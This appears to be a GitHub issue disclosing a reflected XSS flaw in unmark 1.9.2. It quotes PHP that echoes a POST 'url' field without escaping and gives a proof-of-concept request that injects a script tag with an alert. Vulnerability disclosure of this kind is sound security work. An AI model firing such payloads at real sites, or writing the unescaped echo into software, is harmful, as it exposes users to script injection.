Skip to content

XSS vulnerability (in version older version 1.9.2) #290

@xjzzzxx

Description

@xjzzzxx

Hello,

I would like to report for a xss vulnerability in unmark-1.9.2.

The path of the vulnerability.

In file application/views/marks/add_by_url.php

if ( $_POST ) :										// Line 3
    $url = $_POST['url'];							// Line 7
    echo '<p><strong>URL:</strong>' . $url . '</p>';	// Line 8

We see that there is no check between the input $_POST["url"] and the output(Line 8)

Thus the XSS will happen at echo '<p><strong>URL:</strong>' . $url . '</p>';

Poc:

POST /marks/add_by_url

add_from_url=1&url=</p><script>alert('xss')</script>

Manual verification:

1

2

Metadata

Metadata

Assignees

Labels

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions